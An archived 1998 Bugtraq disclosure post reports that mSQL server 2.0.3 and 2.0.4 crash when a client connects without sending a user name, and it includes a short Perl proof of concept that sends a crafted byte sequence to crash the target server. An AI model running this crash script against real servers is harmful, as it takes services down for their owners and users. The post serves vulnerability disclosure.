[8519] in bugtraq
mSQL dummies
daemon@ATHENA.MIT.EDU (Peter Boutzev)
Thu Nov 12 16:03:20 1998
Date: Wed, 11 Nov 1998 19:09:27 +0100
Reply-To: boutzev@usa.net
From: Peter Boutzev <boutzev@USA.NET>
To: BUGTRAQ@NETSPACE.ORG
Hello to everyone,
That is: in function "msqlConnect()" , libmsql checks the user name of
the logged user. Ok, let's try to connect to an mSQL server without sending it.
I thought that my prog did not work, because it was unable to connect the mSQL
server. After several retries, I understood that the server was gone away. I
restarted it, and made a new connection. Here is what happens:
---------------
Hit by a sig 11
Forced server shutdown due to bad signal!
IOT trap/Abort
-------------
I discovered this where I was doing an mSQL Clinent with an old
libmsql.dll under Windows. I have no time to look further on the problem,
and I am useing mySQL now. Anyway here is a small cut of code that demonstrates
the problem.
------------------------- CUT HERE --------------------------
#!/usr/bin/perl
use IO::Socket;
$host = @ARGV[0];
$port = @ARGV[1];
&Connect;
sub Connect {
$sock = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $host,
PeerPort => "msql($port)",
) or die "Cannot connect !";
$sock->autoflush(1);
print $sock "\x05\x00\x00\x00\x00\x0A\x03\x31\x3A\x0A";
while (<$sock>) {
print;
}
printf "Y0!-y0-Y0!\n";
}
------------------------------ END ---------------------------
I don't know was this discussed here before, ot not, I informed Hughes
Technologies 5 months ago, and they did not respond me. Maybe in the new
mSQL 2.0.5 or later the bug was patched, I have no time to test it. 2.0.3
and 2.0.4 seem to be vulnerable. I am not sure about gaining remote access
with this. Anyway, I thought that it should be posted here...
